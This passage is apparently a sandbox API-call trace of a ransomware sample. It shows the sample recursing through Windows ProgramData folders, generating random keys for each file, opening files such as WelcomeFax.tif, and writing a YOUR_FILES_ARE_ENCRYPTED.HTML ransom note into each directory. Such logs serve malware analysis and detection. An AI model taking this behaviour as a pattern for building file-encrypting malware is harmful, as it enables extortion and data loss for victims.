HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0108.108] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0108.108] StrStrIW (lpFirst="VirtualInbox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.108] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 58 [0108.108] GetProcessHeap () returned 0x600000 [0108.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0108.108] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0108.108] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*" [0108.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName=".", cAlternateFileName="")) returned 0x626738 [0108.109] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 1 [0108.109] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="en-US", cAlternateFileName="")) returned 1 [0108.109] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.109] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 64 [0108.109] GetProcessHeap () returned 0x600000 [0108.109] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0108.110] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0108.110] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*" [0108.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x63c6f8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0108.111] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x63c6f8, cFileName="..", cAlternateFileName="")) returned 1 [0108.111] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x63d450, dwReserved1=0x63c6f8, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 1 [0108.111] StrStrIW (lpFirst="WelcomeFax.tif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.111] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 79 [0108.111] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0108.111] lstrlenW (lpString=".tif") returned 4 [0108.111] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0108.111] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0108.111] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0108.111] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x63d450, dwReserved1=0x63c6f8, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 0 [0108.111] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0108.112] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0108.112] GetProcessHeap () returned 0x600000 [0108.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0108.112] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0108.112] WriteFile (in: hFile=0x304, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0108.113] CloseHandle (hObject=0x304) returned 1 [0108.114] GetProcessHeap () returned 0x600000 [0108.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0108.114] GetProcessHeap () returned 0x600000 [0108.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0108.115] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="en-US", cAlternateFileName="")) returned 0 [0108.115] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0108.116] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0108.116] GetProcessHeap () returned 0x600000 [0108.116] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0108.116] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0108.116] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.118] CloseHandle (hObject=0x32c) returned 1 [0108.118] GetProcessHeap () returned 0x600000 [0108.118] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0108.118] GetProcessHeap () returned 0x600000 [0108.118] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0108.118] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0108.119] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0108.119] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0108.119] GetProcessHeap () returned 0x600000 [0108.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3173dd8 [0108.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0108.119] WriteFile (in: hFile=0x310, lpBuffer=0x3173dd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3173dd8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.120] CloseHandle (hObject=0x310) returned 1 [0108.121] GetProcessHeap () returned 0x600000 [0108.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0108.122] GetProcessHeap () returned 0x600000 [0108.122] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0108.122] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="MSScan", cAlternateFileName="")) returned 1 [0108.132] StrStrIW (lpFirst="MSScan", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.132] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned 46 [0108.132] GetProcessHeap () returned 0x600000 [0108.132] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.133] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" [0108.133] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*" [0108.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0108.133] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 1 [0108.133] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62dcb75e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62dcb75e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62dcb75e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0108.134] StrStrIW (lpFirst="WelcomeScan.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.134] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 62 [0108.134] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0108.134] lstrlenW (lpString=".jpg") returned 4 [0108.134] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0108.134] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0108.134] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0108.134] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62dcb75e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62dcb75e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62dcb75e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0108.134] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0108.135] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0108.135] GetProcessHeap () returned 0x600000 [0108.135] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.135] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.135] WriteFile (in: hFile=0x308, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.137] CloseHandle (hObject=0x308) returned 1 [0108.138] GetProcessHeap () returned 0x600000 [0108.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.138] GetProcessHeap () returned 0x600000 [0108.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.139] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="MSScan", cAlternateFileName="")) returned 0 [0108.139] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0108.139] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0108.139] GetProcessHeap () returned 0x600000 [0108.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0108.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.140] WriteFile (in: hFile=0x30c, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.141] CloseHandle (hObject=0x30c) returned 1 [0108.142] GetProcessHeap () returned 0x600000 [0108.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.142] GetProcessHeap () returned 0x600000 [0108.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0108.143] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="WinMSIPC", cAlternateFileName="")) returned 1 [0108.143] StrStrIW (lpFirst="WinMSIPC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.143] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC") returned 37 [0108.143] GetProcessHeap () returned 0x600000 [0108.143] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0108.144] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC" [0108.144] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\*" [0108.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0108.145] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0108.145] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Server", cAlternateFileName="")) returned 1 [0108.145] StrStrIW (lpFirst="Server", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.145] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server") returned 44 [0108.145] GetProcessHeap () returned 0x600000 [0108.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.147] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server" [0108.147] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server\\*" [0108.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, 